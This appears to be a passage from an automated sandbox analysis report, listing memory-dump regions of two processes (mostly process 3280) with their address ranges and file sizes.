                                                                  • memory/3280-297-0x00007FFC134C0000-0x00007FFC134F3000-memory.dmp

                                                                    Filesize

                                                                    204KB

                                                                  • memory/3280-71-0x00007FFC02BB0000-0x00007FFC02C7E000-memory.dmp

                                                                    Filesize

                                                                    824KB

                                                                  • memory/3280-66-0x00007FFC134C0000-0x00007FFC134F3000-memory.dmp

                                                                    Filesize

                                                                    204KB

                                                                  • memory/3280-64-0x00007FFC15FC0000-0x00007FFC15FCD000-memory.dmp

                                                                    Filesize

                                                                    52KB

                                                                  • memory/3280-62-0x00007FFC15FD0000-0x00007FFC15FE9000-memory.dmp

                                                                    Filesize

                                                                    100KB

                                                                  • memory/3280-60-0x00007FFC02C80000-0x00007FFC02DFF000-memory.dmp

                                                                    Filesize

                                                                    1.5MB

                                                                  • memory/3280-58-0x00007FFC161C0000-0x00007FFC161E5000-memory.dmp

                                                                    Filesize

                                                                    148KB

                                                                  • memory/3280-35-0x00007FFC18340000-0x00007FFC1834F000-memory.dmp

                                                                    Filesize

                                                                    60KB

                                                                  • memory/3280-199-0x00007FFC02C80000-0x00007FFC02DFF000-memory.dmp

                                                                    Filesize

                                                                    1.5MB

                                                                  • memory/3280-50-0x00007FFC18200000-0x00007FFC18219000-memory.dmp

                                                                    Filesize

                                                                    100KB

                                                                  • memory/3280-52-0x00007FFC161F0000-0x00007FFC1621B000-memory.dmp

                                                                    Filesize

                                                                    172KB

                                                                  • memory/3280-25-0x00007FFC03170000-0x00007FFC037D4000-memory.dmp

                                                                    Filesize

                                                                    6.4MB

                                                                  • memory/3280-150-0x00007FFC161C0000-0x00007FFC161E5000-memory.dmp

                                                                    Filesize

                                                                    148KB

                                                                  • memory/3280-75-0x00007FFC134A0000-0x00007FFC134B4000-memory.dmp

                                                                    Filesize

                                                                    80KB

                                                                  • memory/3280-313-0x00007FFC02BB0000-0x00007FFC02C7E000-memory.dmp

                                                                    Filesize

                                                                    824KB

                                                                  • memory/3280-315-0x00007FFC02670000-0x00007FFC02BA3000-memory.dmp

                                                                    Filesize

                                                                    5.2MB

                                                                  • memory/3280-342-0x00007FFC02C80000-0x00007FFC02DFF000-memory.dmp

                                                                    Filesize

                                                                    1.5MB

                                                                  • memory/3280-336-0x00007FFC03170000-0x00007FFC037D4000-memory.dmp

                                                                    Filesize

                                                                    6.4MB

                                                                  • memory/3280-376-0x00007FFC02BB0000-0x00007FFC02C7E000-memory.dmp

                                                                    Filesize

                                                                    824KB

                                                                  • memory/3280-380-0x00007FFC13490000-0x00007FFC1349D000-memory.dmp

                                                                    Filesize

                                                                    52KB

                                                                  • memory/3280-379-0x00007FFC134A0000-0x00007FFC134B4000-memory.dmp

                                                                    Filesize

                                                                    80KB

                                                                  • memory/3280-378-0x00007FFC03A00000-0x00007FFC03AB3000-memory.dmp

                                                                    Filesize

                                                                    716KB

                                                                  • memory/3280-377-0x00007FFC03170000-0x00007FFC037D4000-memory.dmp

                                                                    Filesize

                                                                    6.4MB

                                                                  • memory/3280-375-0x00007FFC134C0000-0x00007FFC134F3000-memory.dmp

                                                                    Filesize

                                                                    204KB

                                                                  • memory/3280-374-0x00007FFC15FC0000-0x00007FFC15FCD000-memory.dmp

                                                                    Filesize

                                                                    52KB

                                                                  • memory/3280-373-0x00007FFC15FD0000-0x00007FFC15FE9000-memory.dmp

                                                                    Filesize

                                                                    100KB

                                                                  • memory/3280-372-0x00007FFC02C80000-0x00007FFC02DFF000-memory.dmp

                                                                    Filesize

                                                                    1.5MB

                                                                  • memory/3280-371-0x00007FFC161C0000-0x00007FFC161E5000-memory.dmp

                                                                    Filesize

                                                                    148KB

                                                                  • memory/3280-370-0x00007FFC161F0000-0x00007FFC1621B000-memory.dmp

                                                                    Filesize

                                                                    172KB

                                                                  • memory/3280-369-0x00007FFC18200000-0x00007FFC18219000-memory.dmp

                                                                    Filesize

                                                                    100KB

                                                                  • memory/3280-368-0x00007FFC18340000-0x00007FFC1834F000-memory.dmp

                                                                    Filesize

                                                                    60KB

                                                                  • memory/3280-367-0x00007FFC16290000-0x00007FFC162B7000-memory.dmp

                                                                    Filesize

                                                                    156KB

                                                                  • memory/4940-217-0x000001ECC2F50000-0x000001ECC2F58000-memory.dmp

                                                                    Filesize

                                                                    32KB